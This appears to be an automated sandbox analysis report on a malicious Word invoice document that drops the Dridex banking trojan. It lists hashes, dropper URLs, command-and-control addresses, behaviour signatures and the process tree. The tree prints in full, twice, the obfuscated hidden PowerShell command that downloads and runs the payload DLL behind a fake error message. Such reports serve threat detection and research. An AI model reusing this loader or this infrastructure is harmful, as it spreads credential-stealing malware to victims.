Analysis

  • max time kernel
    70s
  • max time network
    78s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    08-12-2020 15:33

General

  • Target

    Inv.Docum.559488870.doc

  • Size

    215KB

  • MD5

    00a2b86ce0838d196772467738cbf883

  • SHA1

    fd9d7e35c7b1ad644d1970bb6ac4e184171486f4

  • SHA256

    0144312afb25e3dbef3ef44e2802c3bbd93527eea90ea8d325c7e8193e57d9c4

  • SHA512

    da97703e140912d396a950aad0a971fb6cd6e0f2e27d29a8009048b8cd29a9f3ee8c87e886dd460f915ada9235152168666c0556b148bfa4d9d306fe8eadeb3a

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://findqualityparts.com/kr44dt.zip

exe.dropper

https://saelectronicstrading.com/dekkp2ciq.zip

exe.dropper

http://loftkultur.binkhalidinternational.com/hh7lww450.zip

exe.dropper

http://excursoesdeinhamais.resultaweb.com.br/edyk3dbr.zip

exe.dropper

http://vibeautospa.com/xm9d9i.zip

exe.dropper

https://greeninvestconsulting.com/c51qtl1uf.zip

exe.dropper

https://owl-squad.com/icg2mmdqx.zip

Extracted

Family

dridex

Botnet

10555

C2

104.131.164.93:443

46.101.90.205:4643

27.254.174.84:4443

92.94.251.127:3786

rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Dridex Loader 1 IoCs

    Detects Dridex both x86 and x64 loader in memory.

  • Blocklisted process makes network request 4 IoCs
  • Loads dropped DLL 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Inv.Docum.559488870.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:596
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD cwBFAHQALQB2AEEAcgBpAGEAQgBsAGUAIAAgACgAJwBXAHoAJwArACcAcAAnACkAIAAgACgAIAAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADIAfQAiAC0ARgAgACcAcgAnACwAJwBpAE8ALgBEACcALAAnAGUAQwB0AE8AcgB5ACcALAAnAFMAWQBTAHQARQBtAC4AJwAsACcAaQAnACkAIAApADsAUwBFAHQALQBJAFQARQBNACAAIAAoACIAVgBBAFIAIgArACIAaQBBAEIATABlADoASwBRAEQAMwAiACsAIgBvAFAAIgApACAAIAAoACAAWwBUAHkAcABlAF0AKAAiAHsAMAB9AHsANAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACcAcwBZAFMAJwAsACcAaQBuAHQAbQBBAG4AQQBnAGUAcgAnACwAJwBlAHAAbwAnACwAJwBpAEMAJwAsACcAVABlAG0ALgBuAEUAVAAuAHMAZQByAFYAJwApACkAIAAgADsAIAAgACQATwA3AGIAMgB5AGUAcwA9ACgAKAAnAEYAJwArACcANQB6ADAAJwApACsAJwBwACcAKwAnAGsAZQAnACkAOwAkAEcAMgBkAGgAcwBvADgAPQAkAEoAYwBxAHQANgBwAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEgAaQA1AGoAdwBoAG0AOwAkAEoANgB5AHcAbQBmADMAPQAoACcARwA4ACcAKwAoACcAeAA2AG0AYwAnACsAJwBrACcAKQApADsAIAAgACgARwBlAFQALQBpAFQAZQBtACAAIAAoACcAdgBhAHIAaQAnACsAJwBBAGIAJwArACcAbABlADoAJwArACcAVwBaAHAAJwApACAAKQAuAFYAYQBsAFUAZQA6ADoAIgBDAGAAUgBFAEEAdABlAGAARABpAHIAZQBgAGMAVABvAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAEsAJwArACcAbAAnACsAKAAnAGYASAAnACsAJwAyACcAKQArACgAJwBzADYAeQAnACsAJwBiACcAKQArACgAJwBhAEsAJwArACcAbABmAEwAJwApACsAJwBnACcAKwAnAHEAJwArACgAJwB3AGEAYgBuACcAKwAnAEsAbABmACcAKQApAC4AIgByAGAAZQBgAFAAbABBAGMARQAiACgAKAAnAEsAbAAnACsAJwBmACcAKQAsAFsAUwBUAFIASQBOAEcAXQBbAGMAaABhAFIAXQA5ADIAKQApACkAOwAkAEIAdABqADAAdwA2AG8APQAoACgAJwBRACcAKwAnAHcAcgBxACcAKQArACgAJwBsACcAKwAnAGoAXwAnACkAKQA7ACAAIAAkAGsAcQBkADMAbwBwADoAOgAiAHMARQBjAFUAUgBgAGkAdABgAFkAYABQAHIAYABPAFQATwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATQBzAHcAdQB3AHMAdgA9ACgAKAAnAEgAawAnACsAJwBrACcAKQArACgAJwA5ADMAJwArACcAbwAnACkAKwAnAGQAJwApADsAJABNAGsAOQBrAHAAYgA0ACAAPQAgACgAKAAnAFkAeABoAGQAJwArACcAMAAnACkAKwAnAG4AJwApADsAJABOAHIAdABfADIAegBsAD0AKAAnAFoAJwArACcAOQB4ACcAKwAoACcAbgA1AHEAJwArACcAMgAnACkAKQA7ACQATwA5AGIAeQBtAHYAcQA9ACgAJwBHAHMAJwArACgAJwBqACcAKwAnAHMAeQBjADgAJwApACkAOwAkAEgAagBzADEAagBtAGoAPQAkAEgATwBNAEUAKwAoACgAJwB5ACcAKwAoACcAZgAnACsAJwBBAEgAMgBzADYAJwArACcAeQAnACkAKwAnAGIAYQAnACsAJwB5AGYAJwArACgAJwBBACcAKwAnAEwAZwAnACkAKwAnAHEAdwAnACsAKAAnAGEAYgBuACcAKwAnAHkAZgAnACsAJwBBACcAKQApAC4AIgBSAGAARQBQAGwAYQBgAGMAZQAiACgAKABbAEMAaABBAHIAXQAxADIAMQArAFsAQwBoAEEAcgBdADEAMAAyACsAWwBDAGgAQQByAF0ANgA1ACkALABbAHMAVABSAEkATgBHAF0AWwBDAGgAQQByAF0AOQAyACkAKQArACQATQBrADkAawBwAGIANAArACgAJwAuACcAKwAoACcAZABsACcAKwAnAGwAJwApACkAOwAkAEMAOABkAGMAYwBzADYAPQAoACcAWgBwACcAKwAoACcAbABhAGUAYQAnACsAJwBqACcAKQApADsAJABGADkAMwAyADYAcwAzAD0AbgBFAFcAYAAtAE8AYABCAGoAYABFAEMAVAAgAG4ARQBUAC4AVwBFAGIAYwBMAGkAZQBOAFQAOwAkAFAANAAzAHQAYgB3AG8APQAoACgAKAAoACcAaAAnACsAJwB0AHQAcAAnACsAJwBzADoAcQAnACsAJwBhACkAKAA2ACcAKQApACsAKAAoACcANwApACcAKwAnACgAcQAnACsAJwBhACkAKAAnACkAKQArACgAKAAnADYAJwArACcANwApACgAZgAnACkAKQArACgAJwBpAG4AJwArACcAZABxACcAKwAnAHUAYQBsAGkAdAB5ACcAKwAnAHAAJwApACsAKAAnAGEAcgAnACsAJwB0ACcAKQArACgAJwBzACcAKwAnAC4AYwBvAG0AJwApACsAKAAoACcAcQBhACkAKAAnACsAJwA2ADcAJwApACkAKwAoACgAJwApACgAawAnACsAJwByADQAJwArACcANABkAHQAJwApACkAKwAoACcALgB6AGkAJwArACcAcABAAGgAJwArACcAdAB0AHAAcwA6ACcAKwAnAHEAYQAnACkAKwAoACgAJwApACcAKwAnACgANgAnACkAKQArACgAKAAnADcAKQAnACsAJwAoACcAKQApACsAJwBxACcAKwAoACgAJwBhACkAJwArACcAKAA2ACcAKQApACsAKAAoACcANwApACcAKQApACsAKAAoACcAKABzAGEAZQAnACsAJwBsACcAKQApACsAKAAnAGUAYwAnACsAJwB0AHIAbwBuAGkAYwAnACsAJwBzAHQAcgBhAGQAaQBuACcAKwAnAGcALgBjACcAKQArACgAKAAnAG8AbQBxAGEAJwArACcAKQAoADYAJwArACcANwApACgAJwApACkAKwAnAGQAZQAnACsAJwBrAGsAJwArACgAJwBwADIAYwAnACsAJwBpACcAKwAnAHEALgB6AGkAcABAAGgAJwApACsAJwB0ACcAKwAoACgAJwB0AHAAJwArACcAOgBxAGEAKQAnACkAKQArACgAKAAnACgANgA3ACcAKwAnACkAKAAnACsAJwBxAGEAKQAoADYANwApACgAbABvACcAKQApACsAKAAnAGYAdAAnACsAJwBrAHUAbAAnACkAKwAnAHQAdQAnACsAKAAnAHIALgBiACcAKwAnAGkAbgBrAGgAJwArACcAYQBsACcAKQArACcAaQAnACsAJwBkAGkAJwArACgAJwBuAHQAZQAnACsAJwByAG4AJwApACsAKAAoACcAYQAnACsAJwB0AGkAbwBuACcAKwAnAGEAJwArACcAbAAuAGMAJwArACcAbwBtAHEAYQAnACsAJwApACgANgAnACsAJwA3ACkAKABoAGgANwBsAHcAJwApACkAKwAnAHcAJwArACcANAA1ACcAKwAoACcAMAAnACsAJwAuAHoAaQBwACcAKQArACgAKAAnAEAAaAB0AHQAcAA6ACcAKwAnAHEAYQAnACsAJwApACcAKQApACsAKAAnACgAJwArACcANgA3ACkAJwApACsAJwAoACcAKwAoACgAJwBxAGEAKQAoACcAKwAnADYAJwArACcANwApACcAKwAnACgAZQB4ACcAKwAnAGMAdQByAHMAbwBlACcAKQApACsAKAAnAHMAJwArACcAZABlACcAKQArACgAJwBpAG4AaABhAG0AYQAnACsAJwBpACcAKwAnAHMALgByACcAKQArACgAJwBlAHMAJwArACcAdQBsACcAKwAnAHQAYQB3AGUAJwArACcAYgAuACcAKwAnAGMAbwBtAC4AJwApACsAJwBiACcAKwAoACgAJwByACcAKwAnAHEAYQApACgANgA3ACcAKwAnACkAJwArACcAKABlAGQAJwArACcAeQBrACcAKQApACsAKAAnADMAJwArACcAZABiAHIAJwApACsAKAAoACcALgAnACsAJwB6AGkAcABAACcAKwAnAGgAdAB0AHAAOgBxAGEAKQAnACsAJwAoADYAJwApACkAKwAoACgAJwA3ACcAKwAnACkAKAAnACkAKQArACgAKAAnAHEAJwArACcAYQApACgAJwApACkAKwAoACgAJwA2ACcAKwAnADcAKQAoACcAKQApACsAKAAnAHYAJwArACcAaQBiACcAKQArACgAJwBlACcAKwAnAGEAdQB0AG8AcwBwAGEALgAnACsAJwBjACcAKQArACcAbwAnACsAKAAoACcAbQBxACcAKwAnAGEAKQAoACcAKQApACsAKAAoACcANgA3ACkAKAB4ACcAKwAnAG0AJwApACkAKwAoACcAOQAnACsAJwBkADkAaQAuAHoAJwApACsAKAAnAGkAcABAACcAKwAnAGgAdAB0ACcAKQArACcAcABzACcAKwAoACgAJwA6AHEAJwArACcAYQApACgAJwApACkAKwAnADYAJwArACgAKAAnADcAKQAoACcAKwAnAHEAYQAnACsAJwApACcAKQApACsAJwAoACcAKwAoACgAJwA2ACcAKwAnADcAKQAoACcAKQApACsAJwBnACcAKwAoACgAJwByAGUAZQBuACcAKwAnAGkAbgB2ACcAKwAnAGUAcwB0ACcAKwAnAGMAbwBuAHMAdQBsAHQAaQBuAGcALgBjACcAKwAnAG8AJwArACcAbQBxAGEAKQAoACcAKQApACsAKAAoACcANgA3ACkAKABjADUAMQBxACcAKwAnAHQAJwArACcAbAAxACcAKQApACsAJwB1ACcAKwAnAGYALgAnACsAKAAnAHoAaQBwAEAAJwArACcAaAB0AHQAJwArACcAcABzACcAKQArACcAOgAnACsAKAAoACcAcQBhACcAKwAnACkAKAA2ACcAKQApACsAKAAoACcANwApACgAJwArACcAcQBhACkAJwArACcAKAAnACkAKQArACcANgAnACsAKAAoACcANwApACgAbwB3AGwALQBzACcAKwAnAHEAdQAnACsAJwBhAGQALgAnACsAJwBjACcAKQApACsAJwBvACcAKwAnAG0AJwArACgAKAAnAHEAJwArACcAYQAnACsAJwApACgANgA3ACkAKAAnACkAKQArACgAJwBpAGMAZwAnACsAJwAyAG0AbQAnACkAKwAoACcAZAAnACsAJwBxAHgALgB6AGkAcAAnACkAKQApAC4AIgByAGUAUABgAGwAYQBDAEUAIgAoACgAKAAnAHEAJwArACgAKAAnAGEAJwArACcAKQAoADYANwApACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBzAHAATABgAEkAdAAiACgAJABGAGIAeQBmADgAegBqACAAKwAgACQARwAyAGQAaABzAG8AOAAgACsAIAAkAEEAaAAzAGkAcQA1AGgAKQA7ACQAQgB3AGoAOQBuAHoAcwA9ACgAKAAnAEMAdAAxADgAJwArACcAawAnACkAKwAnAHEAaAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFAAXwBnADAAegBzAHIAIABpAG4AIAAkAFAANAAzAHQAYgB3AG8AIAB8ACAAcwBvAHIAYABUAGAALQBgAE8AYgBKAGUAQwB0ACAAewBnAEUAYABUAC0AUgBBAG4AYABkAGAAbwBtAH0AKQB7AHQAcgB5AHsAJABGADkAMwAyADYAcwAzAC4AIgBkAE8AdwBuAEwAYABvAEEAZABmAEkAYABMAEUAIgAoACQAUABfAGcAMAB6AHMAcgAsACAAJABIAGoAcwAxAGoAbQBqACkAOwAkAEcAcgBsAHcAcAAyAGUAPQAoACcAUgBmACcAKwAoACcAYQA3ADIAdwAnACsAJwBkACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEgAagBzADEAagBtAGoAKQAuACIAbABlAGAATgBHAHQASAAiACAALQBnAGUAIAAzADIAOAAyADYAKQAgAHsAJgAoACcAcgB1ACcAKwAnAG4AZAAnACsAJwBsACcAKwAnAGwAMwAyAC4AZQB4AGUAJwApACAAJABIAGoAcwAxAGoAbQBqACwAMAA7ACQASgAwAHQAMwBtAG8AcwA9ACgAJwBQACcAKwAoACcAYgBvACcAKwAnAF8AbgB5ACcAKQArACcAdwAnACkAOwBiAHIAZQBhAGsAOwAkAE8AXwAwAHQAdgBzAGsAPQAoACgAJwBWAGoAJwArACcAaAAnACkAKwAnAHkAeAAnACsAJwBrAHMAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABPAHkAOAByAHoAcQA4AD0AKAAoACcAVQBjADQAegAnACsAJwAyAHEAJwApACsAJwBrACcAKQA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:896
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:396
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD cwBFAHQALQB2AEEAcgBpAGEAQgBsAGUAIAAgACgAJwBXAHoAJwArACcAcAAnACkAIAAgACgAIAAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADIAfQAiAC0ARgAgACcAcgAnACwAJwBpAE8ALgBEACcALAAnAGUAQwB0AE8AcgB5ACcALAAnAFMAWQBTAHQARQBtAC4AJwAsACcAaQAnACkAIAApADsAUwBFAHQALQBJAFQARQBNACAAIAAoACIAVgBBAFIAIgArACIAaQBBAEIATABlADoASwBRAEQAMwAiACsAIgBvAFAAIgApACAAIAAoACAAWwBUAHkAcABlAF0AKAAiAHsAMAB9AHsANAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACcAcwBZAFMAJwAsACcAaQBuAHQAbQBBAG4AQQBnAGUAcgAnACwAJwBlAHAAbwAnACwAJwBpAEMAJwAsACcAVABlAG0ALgBuAEUAVAAuAHMAZQByAFYAJwApACkAIAAgADsAIAAgACQATwA3AGIAMgB5AGUAcwA9ACgAKAAnAEYAJwArACcANQB6ADAAJwApACsAJwBwACcAKwAnAGsAZQAnACkAOwAkAEcAMgBkAGgAcwBvADgAPQAkAEoAYwBxAHQANgBwAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEgAaQA1AGoAdwBoAG0AOwAkAEoANgB5AHcAbQBmADMAPQAoACcARwA4ACcAKwAoACcAeAA2AG0AYwAnACsAJwBrACcAKQApADsAIAAgACgARwBlAFQALQBpAFQAZQBtACAAIAAoACcAdgBhAHIAaQAnACsAJwBBAGIAJwArACcAbABlADoAJwArACcAVwBaAHAAJwApACAAKQAuAFYAYQBsAFUAZQA6ADoAIgBDAGAAUgBFAEEAdABlAGAARABpAHIAZQBgAGMAVABvAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAEsAJwArACcAbAAnACsAKAAnAGYASAAnACsAJwAyACcAKQArACgAJwBzADYAeQAnACsAJwBiACcAKQArACgAJwBhAEsAJwArACcAbABmAEwAJwApACsAJwBnACcAKwAnAHEAJwArACgAJwB3AGEAYgBuACcAKwAnAEsAbABmACcAKQApAC4AIgByAGAAZQBgAFAAbABBAGMARQAiACgAKAAnAEsAbAAnACsAJwBmACcAKQAsAFsAUwBUAFIASQBOAEcAXQBbAGMAaABhAFIAXQA5ADIAKQApACkAOwAkAEIAdABqADAAdwA2AG8APQAoACgAJwBRACcAKwAnAHcAcgBxACcAKQArACgAJwBsACcAKwAnAGoAXwAnACkAKQA7ACAAIAAkAGsAcQBkADMAbwBwADoAOgAiAHMARQBjAFUAUgBgAGkAdABgAFkAYABQAHIAYABPAFQATwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATQBzAHcAdQB3AHMAdgA9ACgAKAAnAEgAawAnACsAJwBrACcAKQArACgAJwA5ADMAJwArACcAbwAnACkAKwAnAGQAJwApADsAJABNAGsAOQBrAHAAYgA0ACAAPQAgACgAKAAnAFkAeABoAGQAJwArACcAMAAnACkAKwAnAG4AJwApADsAJABOAHIAdABfADIAegBsAD0AKAAnAFoAJwArACcAOQB4ACcAKwAoACcAbgA1AHEAJwArACcAMgAnACkAKQA7ACQATwA5AGIAeQBtAHYAcQA9ACgAJwBHAHMAJwArACgAJwBqACcAKwAnAHMAeQBjADgAJwApACkAOwAkAEgAagBzADEAagBtAGoAPQAkAEgATwBNAEUAKwAoACgAJwB5ACcAKwAoACcAZgAnACsAJwBBAEgAMgBzADYAJwArACcAeQAnACkAKwAnAGIAYQAnACsAJwB5AGYAJwArACgAJwBBACcAKwAnAEwAZwAnACkAKwAnAHEAdwAnACsAKAAnAGEAYgBuACcAKwAnAHkAZgAnACsAJwBBACcAKQApAC4AIgBSAGAARQBQAGwAYQBgAGMAZQAiACgAKABbAEMAaABBAHIAXQAxADIAMQArAFsAQwBoAEEAcgBdADEAMAAyACsAWwBDAGgAQQByAF0ANgA1ACkALABbAHMAVABSAEkATgBHAF0AWwBDAGgAQQByAF0AOQAyACkAKQArACQATQBrADkAawBwAGIANAArACgAJwAuACcAKwAoACcAZABsACcAKwAnAGwAJwApACkAOwAkAEMAOABkAGMAYwBzADYAPQAoACcAWgBwACcAKwAoACcAbABhAGUAYQAnACsAJwBqACcAKQApADsAJABGADkAMwAyADYAcwAzAD0AbgBFAFcAYAAtAE8AYABCAGoAYABFAEMAVAAgAG4ARQBUAC4AVwBFAGIAYwBMAGkAZQBOAFQAOwAkAFAANAAzAHQAYgB3AG8APQAoACgAKAAoACcAaAAnACsAJwB0AHQAcAAnACsAJwBzADoAcQAnACsAJwBhACkAKAA2ACcAKQApACsAKAAoACcANwApACcAKwAnACgAcQAnACsAJwBhACkAKAAnACkAKQArACgAKAAnADYAJwArACcANwApACgAZgAnACkAKQArACgAJwBpAG4AJwArACcAZABxACcAKwAnAHUAYQBsAGkAdAB5ACcAKwAnAHAAJwApACsAKAAnAGEAcgAnACsAJwB0ACcAKQArACgAJwBzACcAKwAnAC4AYwBvAG0AJwApACsAKAAoACcAcQBhACkAKAAnACsAJwA2ADcAJwApACkAKwAoACgAJwApACgAawAnACsAJwByADQAJwArACcANABkAHQAJwApACkAKwAoACcALgB6AGkAJwArACcAcABAAGgAJwArACcAdAB0AHAAcwA6ACcAKwAnAHEAYQAnACkAKwAoACgAJwApACcAKwAnACgANgAnACkAKQArACgAKAAnADcAKQAnACsAJwAoACcAKQApACsAJwBxACcAKwAoACgAJwBhACkAJwArACcAKAA2ACcAKQApACsAKAAoACcANwApACcAKQApACsAKAAoACcAKABzAGEAZQAnACsAJwBsACcAKQApACsAKAAnAGUAYwAnACsAJwB0AHIAbwBuAGkAYwAnACsAJwBzAHQAcgBhAGQAaQBuACcAKwAnAGcALgBjACcAKQArACgAKAAnAG8AbQBxAGEAJwArACcAKQAoADYAJwArACcANwApACgAJwApACkAKwAnAGQAZQAnACsAJwBrAGsAJwArACgAJwBwADIAYwAnACsAJwBpACcAKwAnAHEALgB6AGkAcABAAGgAJwApACsAJwB0ACcAKwAoACgAJwB0AHAAJwArACcAOgBxAGEAKQAnACkAKQArACgAKAAnACgANgA3ACcAKwAnACkAKAAnACsAJwBxAGEAKQAoADYANwApACgAbABvACcAKQApACsAKAAnAGYAdAAnACsAJwBrAHUAbAAnACkAKwAnAHQAdQAnACsAKAAnAHIALgBiACcAKwAnAGkAbgBrAGgAJwArACcAYQBsACcAKQArACcAaQAnACsAJwBkAGkAJwArACgAJwBuAHQAZQAnACsAJwByAG4AJwApACsAKAAoACcAYQAnACsAJwB0AGkAbwBuACcAKwAnAGEAJwArACcAbAAuAGMAJwArACcAbwBtAHEAYQAnACsAJwApACgANgAnACsAJwA3ACkAKABoAGgANwBsAHcAJwApACkAKwAnAHcAJwArACcANAA1ACcAKwAoACcAMAAnACsAJwAuAHoAaQBwACcAKQArACgAKAAnAEAAaAB0AHQAcAA6ACcAKwAnAHEAYQAnACsAJwApACcAKQApACsAKAAnACgAJwArACcANgA3ACkAJwApACsAJwAoACcAKwAoACgAJwBxAGEAKQAoACcAKwAnADYAJwArACcANwApACcAKwAnACgAZQB4ACcAKwAnAGMAdQByAHMAbwBlACcAKQApACsAKAAnAHMAJwArACcAZABlACcAKQArACgAJwBpAG4AaABhAG0AYQAnACsAJwBpACcAKwAnAHMALgByACcAKQArACgAJwBlAHMAJwArACcAdQBsACcAKwAnAHQAYQB3AGUAJwArACcAYgAuACcAKwAnAGMAbwBtAC4AJwApACsAJwBiACcAKwAoACgAJwByACcAKwAnAHEAYQApACgANgA3ACcAKwAnACkAJwArACcAKABlAGQAJwArACcAeQBrACcAKQApACsAKAAnADMAJwArACcAZABiAHIAJwApACsAKAAoACcALgAnACsAJwB6AGkAcABAACcAKwAnAGgAdAB0AHAAOgBxAGEAKQAnACsAJwAoADYAJwApACkAKwAoACgAJwA3ACcAKwAnACkAKAAnACkAKQArACgAKAAnAHEAJwArACcAYQApACgAJwApACkAKwAoACgAJwA2ACcAKwAnADcAKQAoACcAKQApACsAKAAnAHYAJwArACcAaQBiACcAKQArACgAJwBlACcAKwAnAGEAdQB0AG8AcwBwAGEALgAnACsAJwBjACcAKQArACcAbwAnACsAKAAoACcAbQBxACcAKwAnAGEAKQAoACcAKQApACsAKAAoACcANgA3ACkAKAB4ACcAKwAnAG0AJwApACkAKwAoACcAOQAnACsAJwBkADkAaQAuAHoAJwApACsAKAAnAGkAcABAACcAKwAnAGgAdAB0ACcAKQArACcAcABzACcAKwAoACgAJwA6AHEAJwArACcAYQApACgAJwApACkAKwAnADYAJwArACgAKAAnADcAKQAoACcAKwAnAHEAYQAnACsAJwApACcAKQApACsAJwAoACcAKwAoACgAJwA2ACcAKwAnADcAKQAoACcAKQApACsAJwBnACcAKwAoACgAJwByAGUAZQBuACcAKwAnAGkAbgB2ACcAKwAnAGUAcwB0ACcAKwAnAGMAbwBuAHMAdQBsAHQAaQBuAGcALgBjACcAKwAnAG8AJwArACcAbQBxAGEAKQAoACcAKQApACsAKAAoACcANgA3ACkAKABjADUAMQBxACcAKwAnAHQAJwArACcAbAAxACcAKQApACsAJwB1ACcAKwAnAGYALgAnACsAKAAnAHoAaQBwAEAAJwArACcAaAB0AHQAJwArACcAcABzACcAKQArACcAOgAnACsAKAAoACcAcQBhACcAKwAnACkAKAA2ACcAKQApACsAKAAoACcANwApACgAJwArACcAcQBhACkAJwArACcAKAAnACkAKQArACcANgAnACsAKAAoACcANwApACgAbwB3AGwALQBzACcAKwAnAHEAdQAnACsAJwBhAGQALgAnACsAJwBjACcAKQApACsAJwBvACcAKwAnAG0AJwArACgAKAAnAHEAJwArACcAYQAnACsAJwApACgANgA3ACkAKAAnACkAKQArACgAJwBpAGMAZwAnACsAJwAyAG0AbQAnACkAKwAoACcAZAAnACsAJwBxAHgALgB6AGkAcAAnACkAKQApAC4AIgByAGUAUABgAGwAYQBDAEUAIgAoACgAKAAnAHEAJwArACgAKAAnAGEAJwArACcAKQAoADYANwApACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBzAHAATABgAEkAdAAiACgAJABGAGIAeQBmADgAegBqACAAKwAgACQARwAyAGQAaABzAG8AOAAgACsAIAAkAEEAaAAzAGkAcQA1AGgAKQA7ACQAQgB3AGoAOQBuAHoAcwA9ACgAKAAnAEMAdAAxADgAJwArACcAawAnACkAKwAnAHEAaAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFAAXwBnADAAegBzAHIAIABpAG4AIAAkAFAANAAzAHQAYgB3AG8AIAB8ACAAcwBvAHIAYABUAGAALQBgAE8AYgBKAGUAQwB0ACAAewBnAEUAYABUAC0AUgBBAG4AYABkAGAAbwBtAH0AKQB7AHQAcgB5AHsAJABGADkAMwAyADYAcwAzAC4AIgBkAE8AdwBuAEwAYABvAEEAZABmAEkAYABMAEUAIgAoACQAUABfAGcAMAB6AHMAcgAsACAAJABIAGoAcwAxAGoAbQBqACkAOwAkAEcAcgBsAHcAcAAyAGUAPQAoACcAUgBmACcAKwAoACcAYQA3ADIAdwAnACsAJwBkACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEgAagBzADEAagBtAGoAKQAuACIAbABlAGAATgBHAHQASAAiACAALQBnAGUAIAAzADIAOAAyADYAKQAgAHsAJgAoACcAcgB1ACcAKwAnAG4AZAAnACsAJwBsACcAKwAnAGwAMwAyAC4AZQB4AGUAJwApACAAJABIAGoAcwAxAGoAbQBqACwAMAA7ACQASgAwAHQAMwBtAG8AcwA9ACgAJwBQACcAKwAoACcAYgBvACcAKwAnAF8AbgB5ACcAKQArACcAdwAnACkAOwBiAHIAZQBhAGsAOwAkAE8AXwAwAHQAdgBzAGsAPQAoACgAJwBWAGoAJwArACcAaAAnACkAKwAnAHkAeAAnACsAJwBrAHMAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABPAHkAOAByAHoAcQA4AD0AKAAoACcAVQBjADQAegAnACsAJwAyAHEAJwApACsAJwBrACcAKQA=
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1112
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\H2s6yba\Lgqwabn\Yxhd0n.dll 0
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:436
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\H2s6yba\Lgqwabn\Yxhd0n.dll 0
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Checks whether UAC is enabled
            PID:1696

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\H2s6yba\Lgqwabn\Yxhd0n.dll
      MD5

      f4ff765ab41db56376ba8ff3a9104140

      SHA1

      e6436254ef5fec9db4208d772f07c5f2153f5d4d

      SHA256

      8035b530d4c16bc534232b4d2843251fef2ef0d1d68bde32965088d1cdc5b031

      SHA512

      47dbfd3028daf8e93824ba868bb3e962e4be5b19a47ee16c07138b4d2b15fa9629cdb70527c22bdc53ba84f2c40acd045438794002e75b78ea06f63514303996

    • \Users\Admin\H2s6yba\Lgqwabn\Yxhd0n.dll
      MD5

      f4ff765ab41db56376ba8ff3a9104140

      SHA1

      e6436254ef5fec9db4208d772f07c5f2153f5d4d

      SHA256

      8035b530d4c16bc534232b4d2843251fef2ef0d1d68bde32965088d1cdc5b031

      SHA512

      47dbfd3028daf8e93824ba868bb3e962e4be5b19a47ee16c07138b4d2b15fa9629cdb70527c22bdc53ba84f2c40acd045438794002e75b78ea06f63514303996

    • \Users\Admin\H2s6yba\Lgqwabn\Yxhd0n.dll
      MD5

      f4ff765ab41db56376ba8ff3a9104140

      SHA1

      e6436254ef5fec9db4208d772f07c5f2153f5d4d

      SHA256

      8035b530d4c16bc534232b4d2843251fef2ef0d1d68bde32965088d1cdc5b031

